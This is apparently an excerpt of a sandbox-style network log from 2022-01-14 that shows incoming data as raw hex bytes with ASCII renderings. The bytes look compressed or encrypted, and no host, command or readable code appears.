              2022-01-14 10:26:21 UTC976INData Raw: 1a 48 fb f1 13 f0 9f ae 09 09 1a 47 6f 33 a0 35 b2 10 77 06 95 d6 a8 37 91 c0 e9 02 8f c9 5d 55 41 83 e3 2f b9 66 bb 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4 8a 7c 96 5e c8 ce d1 4f 72 99 db 29 a2 2d a6 2e 2f a1 b4 10 68 b4 0f ea 9f b0 16 72 9b d6 a2 3f 95 c9 4f 68 b2 12 6a bf 6e b0 14 6d 36 32 38 09 1e 55 5c d9 35 af 8c 7f f1 03 08 94 51 7c 9c 28 21 d6 b0 02 86 77 17 f9 ec 9c 2a 3f 91 db 33 a3 ac 03 1c 43 92 40 17 e2 ba f4 7c 93 d5 46 fe 79 04 91 c8 df 2e 22 48 fa 72 96 49 77 10 68 a1 b4 12 73 1a 44 1f c9 5e da a8 38 14 7a 90 48 e9 0a 86 62 ab 9b c3 73 1e 54 c0 f1 0d fc 6c b8 16 71 01 03 0e 64 af 8a 70 9e 23
              Data Ascii: HGo35w7]UA/faQk:c-Pp}x Hhw`rIr|^Or)-./hr?Ohjnm628U\5Q|(!w*?3C@|Fy."HrIwhsD^8zHbsTlqdp#
              2022-01-14 10:26:21 UTC977INData Raw: d9 35 af 8c 7f f1 03 08 94 51 7c 9c 28 21 d6 b0 02 86 77 17 f9 ec 9c 2a 3f 91 db 33 a3 ac 03 1c 43 92 40 17 e2 ba f4 7c 93 d5 46 fe 79 04 91 c8 df 2e 22 48 fa 72 96 49 77 10 68 a1 b4 12 73 1a 44 1f c9 5e da a8 38 14 7a 90 48 e9 0a 86 62 ab 9b c3 73 1e 54 c0 f1 0d fc 6c b8 16 71 01 03 0e 64 af 8a 70 9e 23 de b2 15 f0 9d a3 b2 17 e8 93 dc ad 8d de ad 9a 56 de a9 b0 11 ff fc 73 05 0a 9f a9 a5 b0 07 15 ef 07 19 f2 6c ae 0a 84 69 3b 85 f0 86 6c b9 65 24 5d 5f 46 e1 34 39 82 61 5e ca c6 f8 67 22 4a f4 6b 37 9d aa 00 8c 74 83 fa 78 89 f9 ec 9f b0 0e 62 ba ed 05 1a 46 f1 1a 4e e4 8e 44 1a 4f 70 9b c5 7b 12 6c b4 08 8b ff f9 ff fb e2 a5 b0 0b fa 69 3f 91 cc d3 46 fb f8 62 b0 10 75 14 74 90 41 91 d8 b6 1c 5f 4b 6e b9 67 33 bd 6d 22 54 c6 e4 83 e6 8f c7 4d 78 9a 58
              Data Ascii: 5Q|(!w*?3C@|Fy."HrIwhsD^8zHbsTlqdp#Vsli;le$]_F49a^g"Jk7txbFNDOp{li?FbutA_Kng3m"TMxX
              2022-01-14 10:26:21 UTC978INData Raw: 59 f8 13 20 fc 00 5c 53 0e b1 2b d9 3e b5 ff 06 ef 19 07 ce d0 27 0b e2 e2 48 1f 1e 22 cb 73 1e 9c 44 ec 84 3b 12 9b 72 f7 10 09 39 e2 5c af f4 93 65 38 7b 68 c9 58 03 c9 54 db fa c0 9b 14 ca 1f df 68 c2 36 1b 36 94 57 7a 59 32 ee 68 db f1 ca 69 be be fd a5 e3 7d e3 1c 03 bd fc 94 89 39 79 b2 cd 90 2b 59 5d 8c 72 f9 8a 07 4a 0d ec 6d e4 fa 87 f8 bf 77 6b 75 ca 26 54 3a 26 9f 8b 6c 83 1e 93 dc 53 14 ac e2 d4 dc 04 38 16 ad 8b 1b 9c 50 4e 58 b0 13 ba b1 d1 bf 4d 2d 29 6f 10 04 77 67 d3 02 89 91 22 0c 10 0b 01 59 32 20 c6 e9 01 17 1f 13 97 2d c5 bc e6 8e 40 0d e0 07 0d 5c 30 1a ca de cb 4a 5b b5 e5 00 6b ef 15 1f e0 ed 7b e6 29 aa 65 ab 84 19 3f 8f a7 dc 54 98 58 3d d7 3e e6 dd 21 3b e6 91 2d 72 92 4d 35 b0 12 78 3b 30 53 26 00 dd ca e1 6e 0a 32 35 0e a3 3f
              Data Ascii: Y \S+>'H"sD;r9\e8{hXTh66WzY2hi}9y+Y]rJmwku&T:&lS8PNXM-)owg"Y2 -@\0J[k{)e?TX=>!;-rM5x;0S&n25?
              2022-01-14 10:26:21 UTC980INData Raw: a2 22 5d 49 f3 ff ea ad 47 b1 bd 60 d4 c0 b4 db ef bf dc 78 87 f3 f7 e6 aa bb d1 f5 56 6e a2 2b a3 bc 1f 8c 28 22 ee 39 8f d2 d5 40 7f 99 bf 06 22 fc 7f e9 11 ff 0c cf 83 88 fb 21 c5 6b 3f 9d e3 ff 64 fe c8 65 25 d7 25 db b7 ef 61 c6 73 ac 01 1e 5b 5c 48 9c 52 2d 1c 9b d2 d6 a4 3c 8c 3b c4 df bd be 9f a5 bd 63 3b d1 0e e7 83 75 66 a7 bc f9 fa 8c 95 96 d8 7a fa 6f 32 3c 19 85 8c 9b 54 13 8c 70 96 45 b3 3c ab dc 1c d9 45 67 2c 38 4b 44 26 de 00 28 45 70 8d c1 4f f1 99 15 72 51 1d ce d1 40 87 65 be 93 70 56 0e 61 5a d0 71 39 ab ac bc 46 26 55 50 ff af 1d 50 b4 d6 79 d8 a5 bc e3 c7 94 d0 bd aa a0 b1 9f b9 7c 8b 9a 29 43 19 52 68 a4 26 4b 28 13 c6 7e 16 d6 39 85 f0 89 e9 13 f2 78 51 a6 ec 8e 4a fd 33 a4 2c 9f 2f 62 08 8e 4a e0 f3 80 0f 4f c4 23 7f e6 8f c7 25
              Data Ascii: "]IG`xVn+("9@"!k?de%%as[\HR-<;c;ufzo2<TpE<Eg,8KD&(EpOrQ@epVaZq9F&UPPy|)CRh&K(~9xQJ3,/bJO#%
              2022-01-14 10:26:21 UTC981INData Raw: 1f ca cd 47 6a b1 77 ef 4b d6 0f 8e 43 91 da 17 79 ab cc 70 26 29 b4 17 f6 07 9a e9 fe f1 c0 90 41 90 5b 97 c1 7b 2c 99 08 e3 37 95 c7 8b dc 81 07 9f 00 e4 8a 66 a1 51 27 9e 3b 06 3b e9 00 82 70 1c 31 d0 77 8a d0 aa 11 e2 ab a8 e8 25 3c cc 66 38 0a 93 c4 c9 fd 41 d1 96 86 ec 9e 26 59 9b 29 53 09 aa da 3a 16 7a 98 f5 19 18 03 bc 3e 8a 7a 80 6e 5a 96 13 d1 da 07 98 47 72 90 ea 5d f3 2c ac d1 9b db 3d 9c 92 f4 e3 7d a7 14 a7 b8 1d c9 c3 25 92 6f 81 4c 2e 24 59 52 cb eb bb 88 b5 4c 5b 5e d0 c9 4f 7e 9b c1 c0 26 f6 6d 2c 24 44 16 74 82 d7 8c a1 ac 01 07 7d 64 cb 3d 32 98 20 5d 5a d0 36 6c f9 67 9b 70 f8 60 c1 61 10 a7 2f f4 ea 5c 96 46 e9 02 80 20 14 ff 4e 52 ae 01 0b e1 0c e2 36 7f 6c 1d 9d b5 89 fa 80 c4 55 29 15 2b fb fe 7c 95 88 cf 92 ab 0a 4a a9 b1 98 51
              Data Ascii: GjwKCyp&)A[{,7fQ';;p1w%<f8A&Y)S:z>znZGr],=}%oL.$YRL[^O~&m,$Dt}d=2 ]Z6lgp`a/\F NR6lU)+|JQ
              2022-01-14 10:26:21 UTC982INData Raw: b3 32 ae 07 15 e7 06 7c d1 08 59 e5 90 44 16 6f 5c a0 6b 80 ef c1 bd 7c 8f d6 ad 6f fb 57 f3 3a c4 f4 7b 0f 4f 69 04 7b ab 24 c2 fc 65 33 39 98 89 d9 ac ac d3 4c fc 76 53 c7 7a 37 30 e7 ac 16 75 06 15 1b a8 cb f1 c1 d5 4f 6a b7 81 a7 79 4e 7c 42 b2 0a 89 e2 f3 df 3a 0f 54 14 ad 85 e0 be fd 8b 91 99 1a 95 b5 90 4a e1 aa 11 14 1f 70 2c 52 e8 8d d7 c9 52 7d 38 b2 c3 2d ba ea 80 44 b6 bd 91 44 b2 41 9d a0 3c c0 05 3f d0 63 8f 88 61 5f 51 c6 52 ec 29 16 a4 64 a9 b7 92 a1 56 39 8b 43 31 e2 bb 6b 26 c1 2f dd 1c fd 5e 9c 31 b5 94 69 36 04 40 9e f8 3d 8e 4a f6 ca b2 8e ac b5 4a a0 25 ce c5 62 d4 7e 50 71 aa ce dd 2e 25 f2 17 28 2e a1 02 4f 7d 16 6f 20 56 cd 41 1d 61 f1 0a 91 de 66 09 b9 08 59 e0 1e 42 17 f3 3b 93 51 b0 cd 9c c3 7d 1f c9 cb 05 68 cb f8 b7 6b 2d a9
              Data Ascii: 2|YDo\k|oW:{Oi{$e39LvSz70uOjyN|B:TJp,RR}8-DDA<?ca_QR)dV9C1k&/^1i6@=JJ%b~Pq.%(.O}o VAafYB;Q}hk-
              2022-01-14 10:26:21 UTC984INData Raw: f2 d0 02 26 57 41 9d 71 79 5d fd 4c 5a a7 b3 9f ad 88 7f b7 68 16 af e3 2c 25 d0 91 55 a9 b6 db 85 b0 08 86 70 c2 b4 cc c6 75 94 15 f6 64 a9 7a 45 1f c2 73 d5 1f df 3f 9a 1c 33 fe fa c0 5f 12 7d 18 7d 6e 94 7a 7b ae a7 f7 e8 97 c9 d1 28 41 81 51 af d9 26 54 d6 d6 01 26 10 d1 f6 2a 22 56 c2 0c 3c 31 4e 4d a7 e5 0c 70 8e 92 37 63 b9 ec 4a 7c 88 7c 96 b0 60 d7 6f b3 3b 42 0f ef 16 90 e8 e1 2b 20 e4 50 f6 6a bc fd 66 69 01 b3 48 3d 80 73 11 70 a4 73 b9 d4 7b fe 76 8f d5 45 43 f9 cf 92 e3 cd 4e fc 61 f7 6a 1b 02 00 50 1b d7 31 a6 6b 08 ae eb ab 5a 23 d9 37 96 fc 2a 2e 56 75 ad 6e b0 1e 5e 1e 6f 54 a9 3a a1 5e cd 42 1a c7 d1 dc f7 5a 1a a4 22 5e d5 41 b5 81 87 4b b2 f0 89 ea 8b be 59 44 56 4e 2c ae 13 e5 16 03 47 c3 5b ec 44 90 46 ed 12 c6 d3 f2 a9 7e 4b eb 1a
              Data Ascii: &WAqy]LZh,%UpudzEs?3_}}nz{(AQ&T&*"V<1NMp7cJ||`o;B+ PjfiH=sps{vECNajP1kZ#7*.Vun^oT:^BZ"^AKYDVN,G[DF~K
              2022-01-14 10:26:21 UTC985INData Raw: e2 ba e6 9b d7 92 fc 0f 3e 22 53 75 03 16 00 9a fd 3e 7f e3 2d b5 82 83 af f5 9c fd 87 f0 83 ec 79 4a 9a 96 66 4d 2f d0 2e e4 f5 82 ef f6 1b c4 91 d4 c3 fa 50 86 93 f6 e4 94 3a d9 0c 76 8f c6 fa 9a 8b 03 04 30 15 ee 85 eb 06 5a f1 fe 53 cd 44 76 27 e6 85 e7 0e 64 57 2d 5e d6 73 2d b5 9e 21 d0 61 79 6a 23 ec 6c 92 c1 68 c4 26 60 cd 53 74 90 23 52 84 88 70 16 41 7a a0 fb ca cd 44 1c 5f bf 04 6b 3d 26 7d 06 9f a3 be 21 f6 a7 13 fa 89 8d 5a e2 47 cf 3c f3 40 11 2c 12 90 2d c5 9e 5b 26 d3 76 7d b4 de 40 7f 77 d4 ce d8 da 70 61 5d 53 64 57 63 94 41 e2 6b 1b dc a0 2c 2d 5e 05 f6 76 71 22 e2 b4 78 35 9a 57 58 cd 5f b8 47 8d de 19 d1 54 c7 57 5a 65 0f e6 94 5d 48 6a 93 ad 13 c0 1b f9 5a dd 58 18 5c da b5 9c 26 bc b2 f8 73 d2 f7 ee 94 42 10 1f 4e 9d 5f 4f aa 22 4a
              Data Ascii: >"Su>-yJfM/.P:v0ZSDv'dW-^s-!ayj#lh&`St#RpAzD_k=&}!ZG<@,-[&v}@wpa]SdWcAk,-^vq"x5WX_GTWZe]HjZX\&sBN_O"J
              2022-01-14 10:26:21 UTC986INData Raw: 51 69 31 49 a1 19 e2 31 03 74 47 43 67 e7 05 aa 1f ad 2d 82 6b 38 1c 45 f6 2e 9d b6 c0 44 6c 23 80 7f e1 e1 46 14 2d b8 7a 45 9a 53 73 17 13 fc c5 63 4c 51 45 6a b4 0c 7a 62 71 be f0 36 00 83 e5 1d da 24 6f 45 83 c3 c0 eb 70 57 72 9a 5d 54 c4 1e 13 1d d7 f3 c5 66 ab 81 ef 89 f1 ec c7 51 c7 41 f0 46 c1 65 22 4e f5 19 a2 c5 75 a2 0f f8 7a 90 45 a9 ac fd b7 8d 6b 1c 56 cf 52 ec eb ac 52 0a 87 62 af 15 5c 23 e3 b9 55 31 14 5a ca d7 3c 09 90 c2 8a a8 0b f1 1b c1 6d 45 49 9b 0f 92 a0 4a 1a 18 71 b3 9c 5f 81 dc a2 3c 12 75 ed 4f 8d c1 d3 73 04 88 7c 8a 9a 5a 47 73 73 d5 68 a0 2b bb 7d e8 1c c2 f2 c4 c0 ef 06 99 da 22 70 e4 4e fa 8b a0 39 34 32 4a 49 44 17 f4 6a b4 f5 a9 5c ce 7e b8 07 06 97 d6 61 4d 93 e8 50 d3 57 41 98 5b 24 d1 02 7a 95 4a e1 ae c4 f8 96 78 22
              Data Ascii: Qi1I1tGCg-k8E.Dl#F-zESscLQEjzbq6$oEpWr]TfQAFe"NuzEkVRRb\#U1Z<mEIJq_<uOs|ZGssh+}"pN942JIDj\~aMPWA[$zJx"
              2022-01-14 10:26:21 UTC988INData Raw: df 76 1a 41 d7 21 2b f0 14 79 c1 f4 61 8f c2 82 3e e0 79 38 d7 5f 54 97 70 74 87 61 bb 1c 84 b8 6b 6b f0 50 a7 7b 18 3a 92 c9 49 72 99 d9 c7 b9 fd e7 04 9f b0 d8 7e 82 1f 8b f8 a0 75 08 9c 74 fc dc 0a 22 16 7f 62 ac 61 59 31 51 00 88 77 04 8c 9c 29 3d 26 f6 07 1f 8c ca 3d d8 c4 69 8a 81 41 a3 4e 51 49 95 05 3c e4 26 7f 06 4e c4 ba 88 92 95 7a 79 14 71 60 38 da 97 af 39 29 9c 38 02 83 af 86 69 ce 50 64 53 70 9e 60 3d e7 3f db 53 15 f2 9d fc 74 8c 83 4f 1d 32 c8 65 52 e4 9e d1 a4 eb 62 a1 a8 54 aa 08 26 1f c2 f6 9e 2d 7a 26 27 03 09 6d ed f8 64 a5 aa dd 39 fb 82 b1 3f 87 fb f6 33 41 17 90 b9 b2 ce ac 14 6d 5b 36 3d d4 8d c2 f0 78 7b cc bb 69 21 31 17 d9 4a 94 2b b6 58 85 e9 15 1c 9e 8f b9 7e 9b 0a 10 04 46 2d f0 43 44 b8 6d 99 0d ef 1a 44 71 88 d2 c4 02 1f
              Data Ascii: vA!+ya>y8_TptakkP{:Ir~ut"baY1Qw)=&=iANQI<&Nzyq`89)8iPdSp`=?StO2eRbT&-z&'md9?3Am[6=x{i!1J+X~F-CDmDq
              2022-01-14 10:26:21 UTC989INData Raw: e3 5b 43 e7 48 f9 e0 b9 ea e6 78 43 d7 26 43 9a 24 41 3f 41 80 60 24 ff d9 5b a1 08 97 2c c9 b1 4c f6 6c a1 9f e6 9e 22 38 fa 14 46 92 2b ba fd ad 97 cf 33 a7 31 f9 e1 38 fc db e6 79 b4 19 ee eb 45 1f 35 60 a3 43 4a e7 4b 07 fb 2d c5 1b be f0 9b 91 cf 56 97 d4 2c fe 81 8a 17 e9 32 6c bc f8 9b b8 7e 48 6f 92 04 94 2f 40 8a 97 bc f0 9d c1 71 bc b9 71 1a e8 34 58 11 50 2a 58 d1 5c cc 92 22 1d c5 80 95 5d 40 15 f4 08 f0 2a ff 9c 2a 38 16 7f f8 89 bf 68 a3 1f 7e e5 41 99 20 3a e3 57 2b a7 6e ee 98 53 2e 66 46 4f 1d da a3 ac 4b 60 b6 af 56 c8 b3 04 0d 2a ab 58 c5 6c 02 2a 29 d9 ef d6 6d 8d 17 f3 fc f1 ca c0 e7 0c 71 7f e4 c3 72 0f 31 ba ee 88 74 ce de e8 8f 4a 43 96 42 09 10 35 a3 e7 07 91 67 32 36 39 80 25 d3 85 ed a8 e9 7d 0d ed 10 38 03 46 e5 b5 4f 0e 7a 83
              Data Ascii: [CHxC&C$A?A`$[,Ll"8F+318yE5`CJK-V,2l~Ho/@qq4XP*X\"]@**8h~A :W+nS.fFOK`V*Xl*)mqr1tJCB5g269%}8FOz
              2022-01-14 10:26:21 UTC991INData Raw: 80 6b c3 76 8a 20 2f f1 1a 12 6c d3 4d eb d9 2a 37 64 08 00 f4 76 88 1a 2d b1 8d 65 36 27 9c 39 d4 b3 6a 5c 4a 90 5a d4 b0 71 07 71 06 88 6b 98 ee 18 c2 f0 87 ef 1c 18 26 db 73 f1 d3 72 a7 04 fc c2 c9 3b 63 35 14 74 2c 33 a7 bb 01 e1 64 cf 89 e8 ff 24 b4 16 7b 12 be eb 0e 60 d7 25 a2 f8 95 d2 da af d0 c1 63 21 db ce 7c 19 f9 f8 78 d4 c1 00 3d 5e 62 b5 96 5a d4 c0 ce 8f dc b1 65 f5 96 2a 44 f9 1f 7e 9d b2 00 f7 fd 50 a7 b2 1b 94 e2 4f d0 68 e3 3e 62 14 d7 26 12 37 c8 83 59 94 4a eb a1 03 bc f8 7c 5a 9c 23 d8 43 3c b0 5d 58 b9 70 4a b0 0b ef f2 29 dc 56 ae b7 e5 a9 0e 01 6e a0 98 2d af 8e 1b e9 c9 66 dc e2 a6 64 aa 63 41 98 98 49 62 ae aa 88 af 20 8e 1f be ae 18 26 5b 03 1f 31 4b d3 49 62 a9 c7 ba 86 62 c0 b6 11 e1 07 80 d9 72 73 29 ec 2f a9 ce 3c 25 b4 94
              Data Ascii: kv /lM*7dv-e6'9j\JZqqk&sr;c5t,3d${`%c!|x=^bZe*D~POh>b&7YJ|Z#C<]XpJ)Vn-fdcAIb &[1KIbbrs)/<%
              2022-01-14 10:26:21 UTC992INData Raw: 69 c2 2b a4 31 b9 72 5f e9 0c 0a 8d ba a5 ac 0b a8 31 51 1e 5b 29 56 63 36 35 a0 22 3d 87 45 3a 0d ea c2 ee c6 95 25 24 48 f4 79 1f ab f5 18 82 ac 7b 1e 50 18 cd da d4 c5 61 5e c8 dc be f1 b3 1e 8e ec 24 1b 55 a9 4c cd 54 cd 43 f9 0d 36 24 41 90 4d 09 7e 8b f1 45 6d 33 49 92 6f 30 22 5e 0b 6c ce 59 9c b3 f4 67 21 c9 47 74 90 1f 9f 61 d6 fd 12 52 b8 a7 f6 f2 a0 67 d1 68 fa fa 84 52 57 d0 4a 1d 4d f2 5e 99 15 d8 c5 98 5c bd 10 82 26 25 92 1e 4c b6 7c 60 6b a4 48 e0 aa 57 25 c5 d3 48 e4 8f 84 76 c4 9b 99 a7 bc 23 d7 21 df c5 20 2a f3 61 26 81 d6 fe b3 6c 62 d0 01 81 bb aa 50 e4 c9 3c 49 10 8d 2d 38 67 28 3c e9 d8 3b f4 7f e3 24 37 81 eb 16 3d 81 a8 5c 99 b7 9c fd ec 8a 67 fe c9 35 c1 0e 70 c6 90 44 17 2e 9b ad d6 f4 e1 3d 84 6d 3e 4b 36 8d ff 9f 41 9e 84 72
              Data Ascii: i+1r_1Q[)Vc65"=E:%$Hy{Pa^$ULTC6$AM~Em3Io0"^lYg!GtaRghRWJM^\&%L|`kHW%Hv#! *a&lbP<I-8g(<;$7=\g5pD.=m>K6Ar
              2022-01-14 10:26:21 UTC993INData Raw: c7 8d a0 39 89 06 49 19 2e 9b 79 7d fb 04 8a 6c a2 3c 69 3a 04 fb f9 ed f1 ce 05 03 0c 75 1d 67 9a 49 09 02 89 b5 96 4f 21 7c 75 eb 02 9d af 8b a8 38 7a 92 04 f2 64 be 63 92 2e c0 0a 30 33 b8 16 03 e5 a3 66 ba ef 0e 80 bb c2 ea 99 cf a4 ee 38 08 9f a7 47 c5 75 0c 73 0f 83 a0 2d e6 83 a1 af c5 6e ea 9f e1 30 d1 b5 8d c0 e6 90 2a c4 1d c0 f9 e3 28 42 50 e2 de 0f 31 67 3d 8e 40 19 e6 86 6a 03 d1 51 6b 27 cd e0 bc eb 1a 50 3d 23 da a8 e4 30 9a 10 91 ea da 16 39 be ff bd 09 38 0a 21 bd 9a 51 a2 2a 1b c2 f8 75 6c 49 2c 5c 9a 80 4f 1a 95 19 ee 98 5e 27 1f bb c9 50 81 3a 60 de ad 95 9d 78 7c 49 ab 96 5e d1 07 0f 87 40 c4 32 26 4b 6a bd 63 06 e9 12 6f f6 56 86 6f 2d ac 1c 35 40 e2 2a 34 30 3a 70 d0 29 45 fc 74 8d cc de 35 d4 d9 24 16 e7 f7 3e a6 3f 81 eb 5f 5a ad
              Data Ascii: 9I.y}l<i:ugIO!|u8zdc.03f8Gus-n0*(BP1g=@jQk'P=#098!Q*ulI,\O^'P:`x|I^@2&KjcoVo-5@*40:p)Et5$>?_Z
              2022-01-14 10:26:21 UTC995INData Raw: 38 e6 77 44 09 1d c7 26 31 a7 00 59 55 4a 3a b0 a9 f6 6d df 5a 77 65 dd 99 94 4b 71 02 eb 0c 69 55 5e c2 b9 6b cb e9 ee e7 fe 8a 20 42 04 86 16 66 a0 53 71 00 70 2e 79 07 13 f2 10 11 eb 89 e6 92 43 de a2 c3 ab bb 15 0b 17 b5 8c 75 03 76 92 7b 63 20 42 ed c3 33 b8 1b c9 28 4d 7a 9c 31 a2 24 b7 61 13 f9 e3 3c 5c dd 23 cd 48 86 72 1b 1a 51 63 73 0d 06 69 79 0e 6e af e2 c4 fe 4d fa 7c 9b 29 0f b9 65 25 db f2 d0 0d 9d b1 09 b6 1d c9 e1 b3 96 8b ed 63 62 ce 89 63 08 f4 93 77 d2 b9 69 31 b0 ea ea 80 1e ad 2e 62 b8 15 f7 81 b0 ec eb 18 26 34 22 4a 0b 1e 13 f8 63 30 4b 06 96 ac 16 65 35 70 ad e7 f5 48 aa 13 e1 30 52 05 f5 ad 8e 49 76 e1 6b c2 8c 60 78 e2 b7 84 8d 31 e5 16 75 04 e3 41 9a 8c 67 2a 29 79 a7 7c c0 0d 39 d1 5b 55 4a a5 bf 6a b2 11 89 fd e8 25 d9 22 b6
              Data Ascii: 8wD&1YUJ:mZweKqiU^k BfSqp.yCuv{c B3(Mz1$a<\#HrQcsiynM|)e%cbcwi1.b&4"Jc0Ke5pH0RIvk`x1uAg*)y|9[UJj%"
              2022-01-14 10:26:21 UTC996INData Raw: 26 6b 64 1d 18 db 07 03 fc 32 da 4a 79 8d 60 a7 44 10 be fe 09 1b db 2b d3 b8 48 87 3f 1f 60 78 94 33 a5 ae 79 8b 45 63 31 a9 c7 07 5d 5f 40 11 f1 60 24 ab 8d d6 af 86 16 3f 64 71 04 93 c4 ed 1e f5 46 fe 7e 7c c2 8b 06 18 b9 81 ea 87 a2 35 cf 88 77 05 11 55 3b 71 fc 7f eb 19 f6 30 52 e0 d1 8b eb 12 98 f4 72 94 4b 79 6f 2b a4 98 59 48 5e 9c 20 4f 6c 4f c4 e4 64 bb 68 fb a8 dc 50 26 51 7d 1c 57 4d 58 1d cd 4d a8 80 fd f9 52 9e dc 5c db 32 38 0d b6 76 8c f5 3e 12 73 f2 b5 39 84 6a ad 81 49 d0 d3 37 81 25 7b 02 85 04 6a b1 ff fb fc d2 63 59 02 82 9d 45 72 8e 47 69 51 6a 92 04 95 89 9a fc f8 74 74 92 53 17 9c 3c aa 3d 97 dd ec 16 15 ff cb 22 d4 8a 67 15 b9 3a ea ba ba 54 9c 37 86 c1 55 4b 0a d9 e6 3d d5 4d 07 ef 74 76 9d 7f ed 75 0e 7e 9a 27 24 15 8e 93 7f f8
              Data Ascii: &kd2Jy`D+H?`x3yEc1]_@`$?dqF~|5wU;q0RrKyo+YH^ OlOdhP&Q}WMXMR\28v>s9jI7%{jcYErGiQjttS<="g:T7UK=Mtvu~'$
              2022-01-14 10:26:21 UTC997INData Raw: e7 b5 92 4d 7d c4 47 6a fc cf 30 44 d9 31 3f 7b 5a 03 3d 69 cd 65 53 83 f9 4d 61 b8 19 f1 1a a1 73 7d ed b1 eb 6a 73 29 c0 a8 35 ad 9e 20 b5 07 5c d1 5b 5b 9a 72 f8 07 e1 75 26 bb c2 c9 cb ed f9 96 44 19 e6 6d 67 a5 4a aa 83 14 31 3e ec d6 27 2b f3 58 90 b5 66 fd f9 ea 91 dc 3c d5 5b 4c 0a dc d7 da 78 b4 76 61 20 ac 65 74 90 41 89 ef ff 53 1c 2e 4a e2 f7 90 4d 6d a6 84 09 c2 45 14 95 c3 78 9c 2f 46 37 7e fc 7c 87 b9 2f a6 78 fb c9 2c 53 19 04 57 25 85 6a 1e 74 d2 c1 26 5f e2 23 e7 cb 5b 0e 7d 95 71 3c 44 10 20 4c 7e 3c 3c 57 41 d6 bb ef b1 a4 71 03 cc d0 63 83 ef 4c e2 2f ae 8e ea 9d ed 10 77 13 ef 10 40 0e 65 f5 26 38 a1 18 36 36 c2 50 97 b8 64 b6 2f e3 ec 6d cc 8e 55 51 7b 75 61 45 e1 9b dd 3b 76 79 5b 5a cb 47 00 1b 76 70 e5 16 09 66 41 c4 4f 90 9d 2f
              Data Ascii: M}Gj0D1?{Z=ieSMas}js)5 \[[ru&DmgJ1>'+Xf<[Lxva etAS.JMmEx/F7~|/x,SW%jt&_#[}q<D L~<<WAqcL/w@e&866Pd/mUQ{uaE;vy[ZGvpfAO/
              2022-01-14 10:26:21 UTC999INData Raw: 62 a2 27 c9 49 0e 08 6a 45 6a ae 18 68 ab 19 20 4a e5 41 99 c3 71 12 8a 8d cd 5a dd 3d fb 90 bf 9e 2a 27 ca d5 44 7f 33 a6 28 3b 29 68 ab 9e 58 ab 9b 82 ac 06 97 29 d3 cb 2c da 76 9f bd 77 0a e6 81 96 8f db 2f 4d 9f a4 24 57 4e 9f b3 30 9d a1 a6 57 bc 03 1c 40 1b cb b6 b8 13 92 b3 3c 1e 55 49 6c c8 c5 e1 95 cb 53 8a 3b e0 6c 07 84 88 89 fe 6f 37 84 0c 30 a4 59 58 5b 61 5d 4c 27 60 ab fd fd 53 58 ce d3 81 59 29 7a 2b e0 24 aa 46 8d 8a 0b 5c 7f 90 58 c5 7e 83 fb 99 94 44 15 52 45 7a f9 3c b6 ed 13 f7 f0 f5 ef 6e a4 21 d6 7f 62 d2 80 3b 7f c3 32 be 16 87 f8 60 cd 53 18 33 20 2d a2 11 c0 f7 f1 b1 2a 5f 3e 11 3f a2 25 d5 fc fe 1c ed d4 80 17 08 ce bc a4 5e 5d f0 f1 19 e0 bc ef 1a 9d ee 8c 7c 8d 4e 0a 47 67 29 a8 3f f8 36 f8 08 98 d8 93 cc cf 86 c6 8b 83 f0 f1
              Data Ascii: b'IjEjh JAqZ=*'D3(;)hX),vw/M$WN0W@<UIlS;lo70YX[a]L'`SXY)z+$F\X~DREz<n!b;2`S3 -*_>?%^]|NGg)?6
              2022-01-14 10:26:21 UTC1000INData Raw: 0e 01 09 37 5f c0 85 25 df f2 d8 c8 63 da c4 3f 00 8b 01 3a fb c0 2b 51 0c 9a 72 5c 59 9e 82 d2 e8 c2 0b 36 4b 7f b3 28 97 1d d9 5b 6b b2 15 ae 1e e4 71 7d 25 96 b1 a8 89 42 3d df ec 62 28 79 78 54 21 c2 68 a4 3b d3 84 41 36 80 2b 86 b0 b4 cf f4 02 4f aa aa ac a9 6a ce db 1b 27 e4 36 ce d5 f7 e4 a3 45 a3 fc e3 cb 97 dc c7 2b 4a 70 f0 df 99 1e fa 2e c3 fe 18 11 0c 50 61 0e ca 71 29 0b 57 0f bd 25 d5 dc c7 8d 21 90 b8 ab 05 f7 fc 88 99 9d a9 4d 77 7e 83 5b b9 8e 7d a2 95 60 63 99 e2 65 33 2f d2 c4 da 80 3b 17 18 ce 16 6e 8d e1 d0 df 3e ff 47 43 5f 82 86 0b 8b 16 cc 25 07 09 b9 13 d9 56 bf f8 55 e7 54 21 c8 83 86 59 bc 46 08 d7 0f 82 d6 4f 2a 3b dd a2 fc 20 8d 3d c6 82 8e 32 f7 d2 67 19 cb be fa 94 56 0b b2 c2 47 11 d8 30 bc 60 5c 07 3a bf 21 a7 e1 9c 95 93
              Data Ascii: 7_%c?:+Qr\Y6K([kq}%B=b(yxT!h;A6+Oj'6E+Jp.Paq)W%!Mw~[}`ce3/;n>GC_%VUT!YFO*; =2gVG0`\:!
              2022-01-14 10:26:21 UTC1001INData Raw: 42 03 0d ae 07 6c ad 85 9d f6 72 c1 c3 63 26 52 f6 6a 53 dc c3 77 64 6c af 96 85 6d fe 82 7d b3 2a 78 25 89 36 b3 d5 1e 8a a2 a9 71 9e c2 87 bb 63 8f c6 fc 8f 69 42 7e f6 05 4d 72 2d c8 db 31 6c 3c 66 fb 45 76 95 c8 cc c2 6f 8f 92 15 36 ce d7 d6 01 70 72 21 aa 56 39 58 cd f2 73 1c 57 4a be ac 89 10 0b 80 88 b0 0b 8c 34 58 32 33 6a af e4 e3 cf 16 1d 05 2f f4 f2 7b 1b d9 4a 50 55 46 a2 32 5c d7 97 79 0d 71 00 c2 f7 59 ee 83 bd 6b 65 2d 13 2c 3e 50 fb b1 99 8d 3d e3 39 8e a2 e7 08 9a ab 5f 21 47 47 d8 b1 01 0f fb f4 92 e5 08 64 c0 5f a4 4f 15 08 41 e7 fd 5c b1 6f 59 59 b3 e2 d1 a8 5b 8f 25 b2 78 6f 44 cd af e7 64 4d d3 25 3e 70 54 17 46 8a a2 18 21 17 85 6a 18 b4 aa 01 13 f5 e2 fe 83 ee ca 6d 82 2e 24 a9 bb 34 48 17 9c b8 79 11 9e b6 1a 42 c5 f0 e5 23 d2 4a
              Data Ascii: Blrc&RjSwdlm}*x%6qciB~Mr-1l<fEvo6pr!V9XsWJ4X23j/{JPUF2\yqYke-,>P=9_!GGd_OA\oYY[%xoDdM%>pTF!jm.$4HyB#J
